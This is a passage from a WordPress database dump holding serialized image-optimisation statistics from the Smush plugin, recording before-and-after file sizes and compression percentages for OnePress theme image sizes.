:5608;s:10:\"size_after\";i:4842;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:807;s:11:\"size_before\";i:5741;s:10:\"size_after\";i:4934;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.870000000000000994759830064140260219573974609375;s:5:\"bytes\";i:2370;s:11:\"size_before\";i:13266;s:10:\"size_after\";i:10896;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4178,2435,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.5894417431360352566116489470005035400390625;s:5:\"bytes\";i:2623;s:11:\"size_before\";i:27353;s:10:\"size_after\";i:24730;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:304;s:11:\"size_before\";i:3633;s:10:\"size_after\";i:3329;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:491;s:11:\"size_before\";i:5748;s:10:\"size_after\";i:5257;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:493;s:11:\"size_before\";i:5619;s:10:\"size_after\";i:5126;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1335;s:11:\"size_before\";i:12353;s:10:\"size_after\";i:11018;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4179,2434,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.6279749985697122838246286846697330474853515625;s:5:\"bytes\";i:14699;s:11:\"size_before\";i:559328;s:10:\"size_after\";i:544629;s:4:\"time\";d:1.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:12100;s:10:\"size_after\";i:12100;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1404;s:11:\"size_before\";i:23537;s:10:\"size_after\";i:22133;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.359999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:4418;s:11:\"size_before\";i:131307;s:10:\"size_after\";i:126889;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:220202;s:10:\"size_after\";i:220202;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1177;s:11:\"size_before\";i:23303;s:10:\"size_after\";i:22126;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:3332;s:11:\"size_before\";i:55462;s:10:\"size_after\";i:52130;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4368;s:11:\"size_before\";i:93417;s:10:\"size_after\";i:89049;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4180,2433,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:144628;s:10:\"size_after\";i:144628;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18305;s:10:\"size_after\";i:18305;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:27191;s:10:\"size_after\";i:27191;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26806;s:10:\"size_after\";i:26806;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:72326;s:10:\"size_after\";i:72326;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4181,2432,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:236215;s:10:\"size_after\";i:236215;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26559;s:10:\"size_after\";i:26559;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:44039;s:10:\"size_after\";i:44039;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42421;s:10:\"size_after\";i:42421;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:123196;s:10:\"size_after\";i:123196;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4182,2431,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:213035;s:10:\"size_after\";i:213035;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:22741;s:10:\"size_after\";i:22741;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39767;s:10:\"size_after\";i:39767;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:40053;s:10:\"size_after\";i:40053;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:110474;s:10:\"size_after\";i:110474;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4183,2430,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.053650355352527157037911820225417613983154296875;s:5:\"bytes\";i:10850;s:11:\"size_before\";i:107921;s:10:\"size_after\";i:97071;s:4:\"time\";d:0.38000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1534;s:11:\"size_before\";i:14781;s:10:\"size_after\";i:13247;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2030;s:11:\"size_before\";i:19654;s:10:\"size_after\";i:17624;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.25;s:5:\"bytes\";i:1974;s:11:\"size_before\";i:19265;s:10:\"size_after\";i:17291;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:5312;s:11:\"size_before\";i:54221;s:10:\"size_after\";i:48909;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4184,2429,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.1549405052538634919301330228336155414581298828125;s:5:\"bytes\";i:22658;s:11:\"size_before\";i:149509;s:10:\"size_after\";i:126851;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:4000;s:11:\"size_before\";i:22257;s:10:\"size_after\";i:18257;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:4653;s:11:\"size_before\";i:27965;s:10:\"size_after\";i:23312;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:4665;s:11:\"size_before\";i:27242;s:10:\"size_after\";i:22577;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:9340;s:11:\"size_before\";i:72045;s:10:\"size_after\";i:62705;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4185,2428,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.5220372030127207185756788021535612642765045166015625;s:5:\"bytes\";i:996;s:11:\"size_before\";i:190791;s:10:\"size_after\";i:189795;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.600000000000000088817841970012523233890533447265625;s:5:\"bytes\";i:725;s:11:\"size_before\";i:27866;s:10:\"size_after\";i:27141;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.770000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:271;s:11:\"size_before\";i:35310;s:10:\"size_after\";i:35039;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33961;s:10:\"size_after\";i:33961;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:93654;s:10:\"size_after\";i:93654;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4186,2427,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.3187022123232789994062841287814080715179443359375;s:5:\"bytes\";i:1942;s:11:\"size_before\";i:147266;s:10:\"size_after\";i:145324;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19959;s:10:\"size_after\";i:19959;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26194;s:10:\"size_after\";i:26194;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:24819;s:10:\"size_after\";i:24819;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1942;s:11:\"size_before\";i:76294;s:10:\"size_after\";i:74352;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4187,2426,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.386765038542517203268289449624717235565185546875;s:5:\"bytes\";i:9992;s:11:\"size_before\";i:57469;s:10:\"size_after\";i:47477;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:428;s:11:\"size_before\";i:3581;s:10:\"size_after\";i:3153;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:769;s:11:\"size_before\";i:5168;s:10:\"size_after\";i:4399;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:3999;s:11:\"size_before\";i:19830;s:10:\"size_after\";i:15831;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:596;s:11:\"size_before\";i:4669;s:10:\"size_after\";i:4073;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1629;s:11:\"size_before\";i:9792;s:10:\"size_after\";i:8163;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2571;s:11:\"size_before\";i:14429;s:10:\"size_after\";i:11858;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4188,2424,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.052559680338786218811719663790427148342132568359375;s:5:\"bytes\";i:1541;s:11:\"size_before\";i:146405;s:10:\"size_after\";i:144864;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:17896;s:10:\"size_after\";i:17896;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26413;s:10:\"size_after\";i:26413;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:24174;s:10:\"size_after\";i:24174;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.979999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1541;s:11:\"size_before\";i:77922;s:10:\"size_after\";i:76381;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(4189,2423,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:229320;s:10:\"size_after\";i:229320;s:4:\"time\";d:0.40000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:25127;s:10:\"size_after\";i:25127;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42708;s:10:\"size_after\";i:42708;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:40371;s:10:\"size_after\";i:40371;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:121114;s:10:\"size_after\";i:121114;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4190,2422,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.1405067787893087560835425620098249055445194244384765625;s:5:\"bytes\";i:265;s:11:\"size_before\";i:188603;s:10:\"size_after\";i:188338;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:265;s:11:\"size_before\";i:18925;s:10:\"size_after\";i:18660;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:36836;s:10:\"size_after\";i:36836;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:36806;s:10:\"size_after\";i:36806;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:96036;s:10:\"size_after\";i:96036;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4191,2421,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.42690532113063905939043252146802842617034912109375;s:5:\"bytes\";i:2751;s:11:\"size_before\";i:37041;s:10:\"size_after\";i:34290;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:351;s:11:\"size_before\";i:4720;s:10:\"size_after\";i:4369;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:558;s:11:\"size_before\";i:7717;s:10:\"size_after\";i:7159;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.62000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:571;s:11:\"size_before\";i:7489;s:10:\"size_after\";i:6918;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1271;s:11:\"size_before\";i:17115;s:10:\"size_after\";i:15844;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4192,2420,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:281040;s:10:\"size_after\";i:281040;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:32982;s:10:\"size_after\";i:32982;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:53145;s:10:\"size_after\";i:53145;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:50189;s:10:\"size_after\";i:50189;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:144724;s:10:\"size_after\";i:144724;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4193,2419,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.69650280888721827210474657476879656314849853515625;s:5:\"bytes\";i:9262;s:11:\"size_before\";i:138311;s:10:\"size_after\";i:129049;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1897;s:11:\"size_before\";i:20211;s:10:\"size_after\";i:18314;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1696;s:11:\"size_before\";i:25505;s:10:\"size_after\";i:23809;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1949;s:11:\"size_before\";i:24611;s:10:\"size_after\";i:22662;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.46999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:3720;s:11:\"size_before\";i:67984;s:10:\"size_after\";i:64264;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4194,2418,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:128111;s:10:\"size_after\";i:128111;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18549;s:10:\"size_after\";i:18549;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:23536;s:10:\"size_after\";i:23536;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:21733;s:10:\"size_after\";i:21733;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64293;s:10:\"size_after\";i:64293;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4195,2417,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.0833653312854636396878049708902835845947265625;s:5:\"bytes\";i:3301;s:11:\"size_before\";i:23439;s:10:\"size_after\";i:20138;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5;s:5:\"bytes\";i:356;s:11:\"size_before\";i:3749;s:10:\"size_after\";i:3393;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:615;s:11:\"size_before\";i:4820;s:10:\"size_after\";i:4205;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:588;s:11:\"size_before\";i:4423;s:10:\"size_after\";i:3835;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:1742;s:11:\"size_before\";i:10447;s:10:\"size_after\";i:8705;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4196,2415,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2751;s:10:\"size_after\";i:2751;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2751;s:10:\"size_after\";i:2751;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4197,2414,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2484;s:10:\"size_after\";i:2484;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1